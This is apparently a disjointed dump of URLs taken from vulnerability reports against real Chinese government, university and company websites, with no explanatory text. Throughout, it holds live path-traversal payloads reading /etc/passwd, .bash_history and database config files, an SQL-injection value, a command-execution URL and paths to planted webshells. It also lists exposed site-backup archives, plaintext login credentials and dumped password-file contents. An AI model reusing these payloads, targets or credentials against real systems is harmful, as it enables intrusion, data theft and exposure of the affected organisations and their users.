http://www.iec365.com:8080/DocCenterService/image?photo_id=10443&photo_size=../../../../../../../../../../etc/passwd%00 http://www.ebuymi.com/DocCenterService/image?photo_id=10443&photo_size=../../../../../../../../../../etc/passwd%00 http://www.zbgtj.gov.cn:9080/jmx-console/ http://www.wyol.com.cn/install/install.php http://218.28.177.28/logonAction.do http://www.zjmb.gov.cn/invoker/JMXInvokerServlet http://cms.chinabidding.com/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://drops.wooyun.org/papers/1426 http://www.oaxis.com/cn/product_list.php?id=2 http://b.agent.fang.com/magent/Support/feedback/FeedDetails.aspx?feedid=3620 http://b.agent.fang.com/magent/Support/feedback/myopinions.aspx?txtBeginDate=&txtEndDate=&selStatus=&page=1&action=del&feedid=3620 http://b.agent.fang.com/magent/Support/feedback/FeedDetails.aspx?feedid=3626这条别人的意见来测试! http://b.agent.fang.com/magent/Support/feedback/myopinions.aspx?txtBeginDate=&txtEndDate=&selStatus=&page=1&action=del&feedid=3626 http://esports.games.ifeng.com/lushi/getpic?t= http://esports.games.ifeng.com/lushi/getpic?t= http://mall.oppo.com http://gitlab.baozou.com http://www.rpsg.sgcc.com.cn/ http://zbzl.sgcc.com.cn/ www.rpsg.sgcc.com.cn这个看目录,明显是otcms http://www.longxinet.com/rxcq/news1/ http://www.longxinet.com/rxcq/news1/1/1.txt http://siping.jlcoop.gov.cn/newfile.txt http://www.jlcoop.gov.cn/newfile.txt http://baishan.jlcoop.gov.cn/newfile.txt http://baishan.jlcoop.gov.cn/newfile.txt http://xiaobao.xupt.edu.cn/xiaobao.rar http://pccsu.suda.edu.cn/web.rar http://international.uibe.edu.cn/international.zip http://www.dzu.edu.cn/1.zip http://career.ouc.edu.cn/1.rar http://www.niso.edu.cn/niso.zip http://lywyx.lcvtc.edu.cn/lywyx.rar http://fund.njust.edu.cn/wwwroot.rar http://open.tjrtvu.edu.cn/wwwroot.rar http://lib.xijing.edu.cn/web.zip http://qzlx.zjbc.edu.cn/qzlx.rar http://xljk.qau.edu.cn/1.zip http://career.bnu.edu.cn/upfile.rar http://jxjy.zsc.edu.cn/a.rar http://jiangfan.ujs.edu.cn/data.rar http://dili.gznc.edu.cn/web.rar http://dili.gzhnc.edu.cn/web.rar http://yzb.chd.edu.cn/sql.rar http://mba.cufe.edu.cn/root.rar http://www.fjpsc.edu.cn/fjpsc.rar http://www.jxnu.edu.cn/jxnu.zip http://opc.cqu.edu.cn/www.zip http://lib.ncu.edu.cn/a.rar http://jyb.zstu.edu.cn/jyb.rar http://tufc.shisu.edu.cn/shisu.zip http://qiaoxiang.wyu.edu.cn/qiaoxiang.rar http://www.cque.edu.cn/data.rar http://www.xjufe.edu.cn/web.rar http://mba.tju.edu.cn/a.rar http://xgw.csu.edu.cn/web.zip http://www.zjcgs.gov.cn/news_show.aspx?id=A0000000000000000001&classid=02 http://www.xckfq.gov.cn/Article-View.asp?id=570 http://www.xcfc.gov.cn/Menu_Super.asp?typeid=2 http://www.xccoop.gov.cn/lx_list.asp?lx=1&lxid=42 http://www.xcast.gov.cn/topic/red/news_list.php?ty=9&infoty=23 http://www.xatourism.gov.cn/Entertainment/entertainment_list.aspx?type=traffic&pid=220&id=222 http://www.tzzzfdc.gov.cn/news.aspx?id=38 http://www.whfdc.gov.cn/newhouse/list.php?prjid=-12221 http://www.wlmz.gov.cn/movienews.asp?id=39 http://www.wwjs.gov.cn/list.php?lm2=136 http://www.wysxzfw.gov.cn/portal//new/index.jsp?pCateunid=20101125-5395B1E39D60CBA398BC-11&cateunid=20101125-69DAA6E5CA7C55E8E8B4-11 http://www.wzwsj.gov.cn/product_info.asp?id=26 http://2004.yangchun.gov.cn/gov/law/article.asp?art=41695 http://361.zzszq.gov.cn/articleContent.jsp?colId=204&artId=1247 http://ajj.aks.gov.cn/list.asp?lm=21 http://dwgk.yantai.gov.cn/dwztc/show.jsp?id=234236 http://rshj.yantai.gov.cn/YTIICSMDH/show.jsp?id=239007 http://smwsbsdt.xintai.gov.cn/permissionitem_list_Sort.jspx?sortcode=001001012&areaid=370982 https://passport.minshengec.com http://aixinbaoguo.chinapost.com.cn/zxjz//zxjz/detail_JGAction.do?step=1&ddbh=99880214111500000001&keyddbh=99880214111500000003, http://www.lpai.com.cn/loginController.do?login用户名:admin密码:123456 https://partner.wuhan.wandamoviepark.com/ https://partner.wuhan.wandamoviepark.com/travel/Index https://partner.wuhan.wandamoviepark.com/travel/report http://www.11183.com.cn/ec-web/jsp/addressBook/addressbook_toEditCustom.action?sid=56602这个就OK。 http://zte-e.com/cn/changework.aspx?EID=2 http://pic.sogou.com http://ngcc.cn/ http://218.244.250.94/ http://www.yoyoer.com/order/detail.php?order_id=237 http://www.yoyoer.com/order/detail.php?order_id=231 http://www.yoyoer.com/order/detail.php?order_id=232 http://www.yoyoer.com/order/detail.php?order_id=233 http://www.yoyoer.com/order/detail.php?order_id=2222 http://www.mopi.pw/tz/tz.swf http://blog.tianya.cn/post-5366057-81052146-1.shtml http://cms.766.com/admin/webgame/index.php?c=api&m=index&action=yytest&limit=1&offset=13 http://ap.189store.com/ http://ap.189store.com http://scan.qh.vnet.cn/.svn/entries http://union.tiantian.com/index.php?m=user&a=register_web_email_check&&clientid=name&name=222%40qq.com%20order%20by%204%23&_=1422267896718 URL:erp.tiantian.com http://106.2.161.16:8080 http://sns.web.maxthon.cn/browser/my.php?_r_=http://my.maxthon.cn/?uid=1 http://jiankong.coocaa.net/ http://www.sasu.edu.cn/showjx.asp?smallclassid=28 http://www.sasu.edu.cn/showjx.asp?” --cookie “smallclassid=28” --tables http://www.glbus.net:8000/ http://183.136.203.105/help/detail.php http://cesi.cumt.edu.cn/djzx/manage/login.aspx http://www.189kan.net/Online_1.aspx?WorkId=5 http://27.223.70.49:8080/ http://115.182.17.32:8080/ http://183.136.168.148:8081/about/show.action http://rl.mcdonalds.com.cn/rl/cid.php?pid= http://www1.mcdonalds.com.cn/list/quality/index.php?DocTypeId=61 http://rl.mcdonalds.com.cn/rl/index.php?province=&city=&type2=&address=&range=&curpage=1 http://www1.mcdonalds.com.cn/list/quality/cid.php?DocTypeId= http://alumni.bjtu.edu.cn/sernewslist.aspx?key=22 alumni.bjtu.edu.cn/newsinfon8.aspx?newsid=1 alumni.bjtu.edu.cn/GnxyhInfon2.aspx?ID=1 http://big5.citic.com/trc/cei.intra.citic.com:82/Pages/Login.aspx http://cht.citic/trc/datasync.cei.gov.cn/ControlServer.asmx http://211.100.56.171:8080/ http://211.100.56.171:8080/script http://www.sharp.cn/admin/news/206/edit http://tnew.caijing.com.cn/.svn/entries这个网站的泄露问题,却写错成了http://service.caijing.com.cn/.svn/entries http://tnew.caijing.com.cn/.svn/entries tnew.caijing.com.cn/Group/glist/gid/2 tnew.caijing.com.cn/Group/glist/gid/(sql注入参数) http://58.56.128.33/login/Login.jsp?logintype=1&gopage=&message=55 http://58.56.128.33:81/message.do?redirect=1 dir:/usr/mobile/webapps/ROOT/ http://117.79.131.110:7094 http://nldp.pigai.org:7777 http://debug.pigai.org/admin/ https://ld.edugd.cn/1.txt http://wssp.hb12369.net:8070/spmh/searchmoreData.action?deptid=1 http://**.**.**/ http://**.**.**/ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh http://117.79.131.101:8983/solr/#/ http://wxftp.96520.com:8080/hsccms/ http://wxftp.96520.com:8080/hsccms/templet_pro.do http://www.wooyun.org/bugs/wooyun-2015-094120/trace/dced55236ac48daf075cbc5728c732f7 http://cn.mall-builder.com/ http://www.appstar.com.cn/ http://www.appstar.com.cn/makeapp.htm http://www.wayboo.cn/ http://www.shfuhai.com/download_list.php?class=282 http://www.xhbzdc.com/download_list.php?class=243 http://www.xingguofx.com/download_list.php?class=206 http://www.bdjyjx.com/download_list.php?class=294 http://www.jndsmm.com/download_list.php?class=197 http://www.xakqby.com/download_list.php?class=311 http://www.fangshuilaoguo.com/download_list.php?class=222 http://sjzbangongjiaju.com/download_list.php?class=171 http://chengkai888.com/download_list.php?class=262 http://www.hqdsvf.com/download_list.php?class=308 http://www.dfhlgl.com/download_list.php?class=200 http://www.lnsbhg.com/download_list.php?class=223 http://www.sxtongtu.com/download_list.php?class=250 http://www.xyxf119.com/download_list.php?class=147 http://www.zzpjjg.com/download_list.php?class=229 http://hszyzc.com/download_list.php?class=233 http://chengxinbaipisong.com/download_list.php?class=183 http://www.qiqiangjx.com/download_list.php?class=280 http://www.jljddb.com/download_list.php?class=212 http://qcsiwang.com/download_list.php?class=240 http://www.hbdxps.com/download_list.php?class=282 http://www.huashidaijiaoyu.com/download_list.php?class=207 http://www.hszs555.com/download_list.php?class=262 http://www.chengtiannuanqi.com/download_list.php?class=272 http://www.xayichi.com/download_list.php?class=221 http://www.xayichi.com/download_list.php?class=221 http://www.chengtiannuanqi.com/download_list.php?class=272 http://demo.wdoyo.com/ http://119.75.219.41/s http://rw.baidu.com/ http://www.sysrs.gov.cn/wwwroot.rar http://www.lnnj.gov.cn/wwwroot.rar http://www.hustats.gov.cn/hustats.rar http://ha.10086.cn/mshop/phonenum/v6phonenum!changeCardByValidateCode.action http://www.appstar.com.cn/appstar/manage/queryAceAppShow.action http://www.strongsoft.net/ ldfxb.com/SystemManage/Plan/GetArea.ashx?sqlkey=Map_S_GetSubAreaByPID_PX&pid=330281006000000&_=1421664911304 yj.yywater.gov.cn/SystemManage/Plan/GetArea.ashx?sqlkey=Map_S_GetSubAreaByPID_PX&pid=330281006000000&_=1421664911304 shzh.wlfx.gov.cn/SystemManage/Plan/GetArea.ashx?sqlkey=Map_S_GetSubAreaByPID_PX&pid=330281006000000&_=1421664911304 shzh.dqwater.gov.cn/SystemManage/Plan/GetArea.ashx?sqlkey=Map_S_GetSubAreaByPID_PX&pid=330281006000000&_=1421664911304 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin nemo:x:500:500::/home/nemo:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash mysql:x:503:503::/home/mysql:/bin/bash ucus:x:502:513::/home/ucus:/bin/bash cd_manager:x:504:513::/home/cd_manager:/bin/bash cd_mgr2:x:514:514::/home/cd_mgr2:/bin/bash ucfz:x:515:515::/home/ucfz:/bin/bash readonly:x:516:516::/home/readonly:/bin/bash mfs:x:517:517::/home/mfs:/bin/bash nemoread:x:518:518::/home/nemoread:/bin/bash hadoop:x:519:519::/home/hadoop:/bin/bash shuzy:x:520:520::/home/shuzy:/bin/bash shizy:x:521:521::/home/shizy:/bin/bash ucbase:x:522:522::/home/ucbase:/bin/bash http://58.248.56.116/zecmd/zecmd.jsp http://aic.hainan.gov.cn:5888/admin/protected/index.jsp http://www.zdlife.com/login.do http://www.zdlife.com/ckeditor/uploader/upload/images/file1422287286611.jsp http://www.zdlife.com/ckeditor/uploader/upload/file1422285750645.jsp http://adminht.17u.net/Login.aspx www.mogujie.com ip:114.113.228.211 http://articleso.enet.com.cn/admin/stats.jsp inurl:inurl:http://www.xrush.cn/client/v3/Payments.aspx?bg= http://www.xrush.cn/client/v3/Payments.aspx?bg=B9BCC3&user=414075255&passwd=ysy357159&sponsorid=6 URL:http://www.appstar.com.cn/ctStore.htm http://www.appstar.com.cn/saveApplication.htm URL:http://www.appstar.com.cn/getAppInfo_6b843926-9598-435f-ad75-874b69cd9792.htm http://www.wayboo.cn/ http://www.shfuhai.com/link.php?class=282 http://www.xhbzdc.com/link.php?class=243 http://www.xingguofx.com/link.php?class=206 http://www.bdjyjx.com/link.php?class=294 http://www.jndsmm.com/link.php?class=197 http://www.xakqby.com/link.php?class=311 http://www.fangshuilaoguo.com/link.php?class=222 http://sjzbangongjiaju.com/link.php?class=171 http://chengkai888.com/link.php?class=262 http://www.hqdsvf.com/link.php?class=308 http://www.dfhlgl.com/link.php?class=200 http://www.lnsbhg.com/link.php?class=223 http://www.sxtongtu.com/link.php?class=250 http://www.xyxf119.com/link.php?class=147 http://www.zzpjjg.com/link.php?class=229 http://hszyzc.com/link.php?class=233 http://chengxinbaipisong.com/link.php?class=183 http://www.qiqiangjx.com/link.php?class=280 http://www.jljddb.com/link.php?class=212 http://qcsiwang.com/link.php?class=240 http://www.hbdxps.com/link.php?class=282 http://www.huashidaijiaoyu.com/link.php?class=207 http://www.hszs555.com/link.php?class=262 http://www.chengtiannuanqi.com/link.php?class=272 http://www.xayichi.com/link.php?class=221 http://www.xayichi.com/link.php?class=221 http://www.chengtiannuanqi.com/link.php?class=272 Shell:http://emec.sjtu.edu.cn/bbs/1.asp http://211.152.50.8:8081/login.aspx http://211.152.50.142:8081/login.aspx http://61.152.94.125:8081/login.aspx http://61.152.94.119:8081/login.aspx http://61.152.94.126:8081/login.aspx http://210.51.51.155:8081/login.aspx http://172.24.200.171/portal/demand/getRecommendNew.action?identify=notice http://172.24.200.171/portal/demand/getRecommendNew.action?identify=index http://10.205.22.158/appweb/login/login!checkLoginfoFromTV?keyno=xxx®ionCode=aaaa来获取用户的信息。 http://fw.517na.com/ http://th.517na.com/ http://xianjinbao.icbccs.com.cn/tb/gy/share.do inurl:ftp www.china-spacenet.com http://58.241.17.92:8004/login.asp http://54sh.csu.edu.cn:808/showAddPaper.action http://citicsf.com/myalbum.do?userId=1&albumId=3 site:taobao.com inurl:/c/list_goods.php?category_id= site:taobao.com inurl:/theme/tejia/view/view_article.php?id= site:taobao.com inurl:/theme/daogou/view/list_goods.php?category_id https://**.**.**/ http://www.appstar.com.cn//appstar/manage/queryAceAppShow.action www.vigocam.com也存在漏洞,但是搜索乌云发现2013年b33发布了该网站的漏洞( http://www.appstar.com.cn/musicApp.htm http://61.185.190.243/login.jsp http://61.185.190.243:8000/axis2-admin/listService http://61.185.190.243:8000/services/Cat/exec?cmd=ifconfig http://220.180.239.59/main.php地址 http://221.232.149.168/login.jsp http://118.122.112.10:9090/admin/protected/index.jsp http://118.122.112.10:8051/admin/protected/index.jsp http://118.122.112.10:6988/admin/protected/index.jsp http://hstsp.com/login.do http://infosec.sjtu.edu.cn/ http://infosec.sjtu.edu.cn/Base.asp?id=141 http://www.cmm.zju.edu.cn/ http://www.zy91.com/ http://dqkh.cmda.org.cn/ http://www.dayuw.com/jtg_list.php?act=NSFTW http://www.dayuw.com/jtg_list.php?act=NSFTW http://www.dayuw.com/jtg_list.php?act=NSFTW www.ly.com里被触发了。 http://www.ly.com/robots.txt和http://www.17u.net/robots.txt http://www.17u.net这个站点的泄露应该是间接导致WooYun-2014-87985这个注入被挖出来的。可以看到robot里有贴出来这个注入漏洞所在的动态链接。看红圈就是注入所在的动态页 http://www.rfthr.com/dyzj/News_show.asp?id=1140&tid=82 http://116.228.151.16:8090/browsepeople.action?startIndex=0 http://cn.53fs.com/manage/login.asp http://183.63.191.62:8081/bppf_inf/ http://116.228.151.188:8081/browse/ZCPT http://ganglia.dcloud.cn/ http://116.252.36.38:8001/admin/protected/index.jsp http://www.hbtyzx.org.cn/ddhz-news-wen.asp?Nclassid=11&id=5497 http://www.hbtyzx.org.cn/admin/upfile.asp http://www.hbtyzx.org.cn/admin/images/upfile/2015127225547.asp http://112.91.31.42:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/data/webservice/.bash_history http://112.91.31.74:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/.bash_history http://112.91.31.42:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/webdoc/pipi.cn/gwptest/WEB-INF/classes/dbConfig.properties http://www.qzlyj.gov.cn/leaderList.jsp?parentID=18&childID=74 http://www.qzlyj.gov.cn/download.jsp?filename=../../index.jsp http://182.148.112.202:8000/ http://m.yichemall.com/ http://m.yichemall.com/User/Account/SetNewPassword?select=用户手机号码&key=phone http://www.bjsjwl.com/ http://www.bjgqt.com http://www.bjqx.gov.cn http://www.bjjtyfxx.com http://www.bjscccz.com http://www.qicaishangqing.com http://ganglia.ihep.ac.cn/ http://ganglia.ihep.ac.cn/gweb http://ganglia.ihep.ac.cn/mon/ http://cuc.ihep.ac.cn/PBS/ http://cuc.ihep.ac.cn/Monitor/ http://218.28.234.10/ http://ly.db.17173.com/quests.php?l2=1-90&m2=0&c2=1&r2=0&x=41&y=11 http://www.dionly.com/jiamengdian/agent.aspx?id=1 http://ht.dionly.com/Join/login.asp http://www.appstar.com.cn/musicCenter.htm http://gq.517na.com/BuyerChangeManage/ChangeManage?queryType=3&pnrCode=&orderId=&beginTime=2015-01-21&hidBeginTime=2015-01-21&endTime=2015-01-28&hidEndTime=2015-01-28&buyerId=听闻都改成了参数化查询,但是某个欺骗的逻辑设计导致全部改签机票订单暴露。。。 http://gq.517na.com/BuyerChangeManage/ChangeManage?queryType=-1&pnrCode=&orderId=&beginTime=2014-01-01&hidBeginTime=2014-01-01&endTime=2015-01-28&hidEndTime=2015-01-28&buyerId= http://www.appstar.com.cn/appstar/web/user_AceApp.jsp http://60.166.52.107:8080/ https://qfpay.com/signin http://218.205.67.155/ http://mail.gzccad.gov.cn/ http://www.appstar.com.cn/mall.htm http://www.appstar.com.cn/addOrder.action coding:utf_8 http://www.appstar.com.cn/appstar/web/UploadMyapp.action http://estore.wacom.com.cn http://demo.yuncart.com/index.php并注册一个账号登陆 http://www.yuncart.com/ http://demo.yuncart.com/index.php并注册一个账号登陆 http://111.205.144.130:7001/ http://222.177.4.98/session/new http://117.21.244.175/session/new http://113.132.128.83/session/new http://218.24.46.161:8002/session/new http://218.24.46.161:8003/session/new http://218.24.46.161:8004/session/new https://218.24.46.161/session/new http://219.141.148.56/session/new http://123.173.124.5/session/new http://222.221.17.12/session/new http://124.232.136.140:8001/session/new http://117.21.244.173:8002/session/new http://117.21.244.173:8003/session/new http://113.132.128.83:8003/session/new http://219.149.135.220:8003/session/new http://124.232.136.140:8002/session/new http://117.21.244.175/session/new http://123.173.124.5/session/new http://221.5.242.47/session/new http://219.141.148.56/session/new http://210.76.69.93:8008/netrep/index.jsp http://www.shanghaitour.net/goal/sceList.jsp http://124.193.109.67/ https://vpn.sysucc.org.cn/ http://192.168.108.3/ http://manage.events.qq.com/ http://www.gic.net.cn/ www.wooyun.org/bugs/wooyun-2010-093459 http://m.fangdd.com/house/loupan/house-detail?house_id=21 http://202.101.244.103/web/VOD/list.asp?id=492 http://cha.17173.com/dota2/ajax/Index.html http://franchising.mcdonalds.com.cn/1.rar http://franchising.mcdonalds.com.cn/cn/1.rar http://gitlab.baozou.com/explore/projects/starred http://www.dzldjy.com/Files/help/system/help.asp http://developer.playcrab.com/public/projects http://jxw.akss.gov.cn/admin/index.asp http://www.sxztbw.cn:20046/newsDetail.jsp?id=10 http://119.97.194.18:4503/Default.aspx http://www.5925car.com/WZsearch/WZManage http://gbe.jinri.cn/ http://gbe.jinri.cn:8090/这个端口存在iisput漏洞 http://appscan.360.cn/这个站使用django开发 http://appscan.360.cn/xxx/ http://appscan.360.cn/icon/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/ http://www.qhcqjy.com.cn/info.do?para=viewconte http://mail.lnzx.gov.cn/ www.tenddata.com跳转至www.talkingdata.com http://202.203.16.101/tw/type.asp?typeid=49 http://dianping.chexun.com/bj/coupon_search?button=a&c=&SortDownload=&SortEndTime= http://www.chexun.com/topic/reviews/detailTopic.auto?infoId=2559923&type= http://www.stxyls.com/ http://www.stxyls.com/ywshow.aspx?id=98 http://www.bc.jl.gov.cn/channel.aspx?id=27 http://www.rgrcb.com/news01_1.php?class_id=186&ArticleID=10275 http://www.fh21.com.cn http://news.swupl.edu.cn:8081/Show.aspx?paperName=%CE%F7%C4%CF%D5%FE%B7%A8%B4%F3%D1%A7%B1%A8&qnum=806%20 http://218.207.233.75:81 http://www.dragonsoftit.com/zh_cn/DTShome.php#touchour http://www.dragonsoftit.com http://cn.dolphin.com http://wutongyu.info/uxss.html http://www.fawcar.com.cn/careers/zpInfo.jsp?id=(参数遍历) http://www.fawcar.com.cn/careers/zpInfo.jsp?id=1111 http://www.fawcar.com.cn/careers/zpInfo.jsp?id=1112 http://www.fawcar.com.cn/careers/zpInfo.jsp?id=1113 http://59.108.65.205:81/ http://score.rgrcb.com/ http://180.166.69.180/public http://www.tzb.whu.edu.cn/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F1.asp http://blogmanage.ci123.com/地址 http://wiki.ciwong.com/admin/Home/ http://career.fesco.com.cn/admin http://114.80.69.235:8888/ http://dywomen.dongying.gov.cn/manage/login.aspx?urls=http://dywomen.dongying.gov.cn/manage/index.aspx http://dywomen.dongying.gov.cn/templets/content/sapx.aspx http://m.damai.cn/ http://m.damai.cn/proj.aspx?id=76384 http://x.co/***** http://www.jinri.cn/index.html http://www.ymt360.com/forget http://www.ychl.org/ http://www.ychl.org/product_cat.asp?catid=63&catname=%BE%AB%B2%CA%B0%B8%C0%FD http://www.gyh.com.cn/product_cat.asp?catid=67&catname=%B7%C0%B8%AF%C4%BE%BB%A4%C0%B8 http://www.gyh.com.cn/product_cat.asp?catid=67&catname http://sqlmap.org http://m.xms.be.xiaomi.com/q/id/100561 http://116.114.83.164/Frame/MainIndex https://58.248.49.138/ https://ipcrs.pbccrc.org.cn/mobiletelModify.do?num=0.09377672639675438&method=getAcvitaveCode&newMobileTel=xxxxxxxxxxx&counttime=119 http://202.112.82.24:8023/web/template/web-articleInfo.action?bookArtId=16539 http://bjfslx.fesco.com.cn/samsung.payroll/ http://ams.wmw.cn/Amscontrol/Classclientmanage/showClassClient/classCode/10601/schoolid//gradeid//uid//stop_flag/0%27# http://hd.jstv.com/sdwd/admin/peoplemanager.aspx http://bbs.hh010.com/ http://www.laoganma.com.cn http://oa.bestar.com.cn/oa/Login.aspx http://xxgk.zjds.gov.cn/jcms/jcms_files/jcms1/web1/site/module/oss/downfile.jsp?filename=a.txt&pathfile=media/-1/....//....//module/oss/downfile.jsp http://www.jfcx.cn/index.shtml http://webcache.googleusercontent.com/search?q=cache:SFwiWG2jsYsJ:loadcontrol.ceair.com/UploadFile/20120719030257.xls+8008208820&cd=22&hl=en&ct=clnk http://loadcontrol.ceair.com/robots.txt),但搜索引擎任然收录了大量该站的文件。 http://cai.weibo.cn/h5v3.php/api/match/lists?fromchannel=h5&page=1&size=10&_=1756522&albumid=1 http://122.194.14.173:8060/ http://www.fescovip.com/benefit/regaddredit.aspx?addr=129045 http://www.fescovip.com/benefit/regaddredit.aspx?addr=129046 http://mingxiao.lwvc.edu.cn/mingxiao.rar http://www.cymy.edu.cn/web.rar http://news.zjtu.edu.cn/news.zjtu.edu.cn.rar http://www.swfu.edu.cn/website.rar http://som.xjtu.edu.cn/123.zip http://job.scuec.edu.cn/web.rar http://shc.cufe.edu.cn/bbs.zip http://icsp.ahu.edu.cn/icsp.rar http://fund.tongji.edu.cn/fund.rar http://cyc.lzjtu.edu.cn/cyc.rar http://news.qdu.edu.cn/news.sql http://www.mba.ecnu.edu.cn/mba.rar http://tyb.lcvtc.edu.cn/123.rar http://kjxy.dufe.edu.cn/kjxy.zip http://zt.gdufe.edu.cn/wwwroot.zip http://eng.suda.edu.cn/web.rar http://news.wipe.edu.cn/web.zip http://hj.hsit.edu.cn/web.rar http://jxjy.lcvtc.edu.cn/11.rar http://library.hainu.edu.cn/1.rar http://www.sme.sdnu.edu.cn/wz.rar http://www.dlu.edu.cn/wwwroot.zip http://www.qsxw.gov.cn/www.qsxw.gov.cn.rar http://www.xzcz.gov.cn/wwwroot.rar http://www.hyzhq.gov.cn/hyzhq.rar http://www.lnwater.gov.cn/lnwater.rar http://www.wjjjy.gov.cn/wjjjy.rar http://www.aydj.gov.cn/admin.rar http://bjcczx.gov.cn/www.rar http://lib.dda.gov.cn/lib.rar http://lib.dda.gov.cn/admin.rar http://sfb.kaiping.gov.cn/sfb.rar http://www.zjksb.gov.cn/zjksb.rar http://www.tzinfo.gov.cn/tzinfo.sql http://www.zjkwq.gov.cn/zjkwq.rar http://www.ahtxq.gov.cn/1.rar http://pic.dl.gov.cn/1.zip http://www.uyc.gov.cn/1.rar http://www.lzsjxw.gov.cn/wwwroot.rar http://wnd.dg.gov.cn/wnd.rar http://wnd.dg.gov.cn/1.rar http://www.lbny.gov.cn/www.rar http://www.hbsz.gov.cn/a.rar http://www.rzhb.gov.cn/rzhb.rar http://www.wcb.yn.gov.cn/1.rar http://www.qzgaj.gov.cn/1.rar http://www.jmdbq.gov.cn/1.rar http://www.zjkyx.gov.cn/zjkyx.rar http://www.f5.bjyq.gov.cn/admin.rar http://apeco.gov.cn/bak.rar http://www.bsgajj.gov.cn/123.zip http://www.glgs.gov.cn/1.rar http://www.phagri.gov.cn/1.rar http://gd.xiangtan.gov.cn/123.rar http://www.jxcy.gov.cn/www.jxcy.gov.cn.zip http://oa.bzqts.gov.cn/oa.rar http://www.hic.gov.cn/web.zip http://xjhbk.gov.cn/1.rar http://www.aqdgxc.gov.cn/www.zip http://www.aqdgxc.gov.cn http://www.xjhbk.gov.cn/1.rar http://www.cclgbj.gov.cn/cclgbj.rar http://mlr.gov.cn/mlr.zip http://www.syxnc.gov.cn/www.rar http://gx.bjpop.gov.cn/gx.rar http://www.dpac.gov.cn/www.zip http://www.hstzb.gov.cn/hstzb.rar http://ahtxq.gov.cn/1.rar http://fzb.xiangtan.gov.cn/123.rar http://wx.hhga.gov.cn/wx.tar.gz http://www.baodijiwei.gov.cn/www.rar http://www.czxfw.gov.cn/web.zip http://www.czxfw.gov.cn/web.rar http://www.zltrsj.gov.cn/wwwroot.rar http://xyxh.hldcredit.gov.cn/xyxh.rar http://www.zppolice.gov.cn/www.zppolice.gov.cn.rar http://www.lyxjjw.gov.cn/1.zip http://tourism.longhui.gov.cn/www.rar http://www.cqszta.gov.cn/wwwroot.rar http://www.ahjh.gov.cn/bak.rar http://cg.lhk.gov.cn/cg.rar http://www.zgqingyang.gov.cn/123.rar http://www.sn119.gov.cn/website.rar www.sn119.gov.cn http://www.xtsl.gov.cn/123.rar http://www.hnydsh.gov.cn/web.rar http://www.fqagri.gov.cn/fqagri.gov.cn.zip http://www.hnydsh.gov.cn/data.rar http://www.xyxrmjcy.gov.cn/web.rar http://www.kxzf.gov.cn/web.rar http://www.kxzf.gov.cn/1.rar http://www.zda.gov.cn/a.rar http://gzcx.jscd.gov.cn/1.rar http://www.dzjw.gov.cn/1.rar http://www.doumen.gov.cn/a.rar http://www.taihaoling.gov.cn/taihaoling.rar http://www.tzhymz.gov.cn/123.rar http://zwdt.sd.gov.cn/admin.rar http://en.cnci.gov.cn/web.rar http://en.cnci.gov.cn/data.rar http://shqapp.mca.gov.cn/web.rar http://www.hbnjh.gov.cn/wwwroot.rar http://www.qdeic.gov.cn/data.rar http://www.haikoutour.gov.cn/haikoutour.gov.cn.rar http://www.haikoutour.gov.cn/haikoutour.rar http://www.hfjjzd.gov.cn/1.rar http://mail2012.foshan.gov.cn/data.rar http://www.gaj.hnloudi.gov.cn/gaj.rar 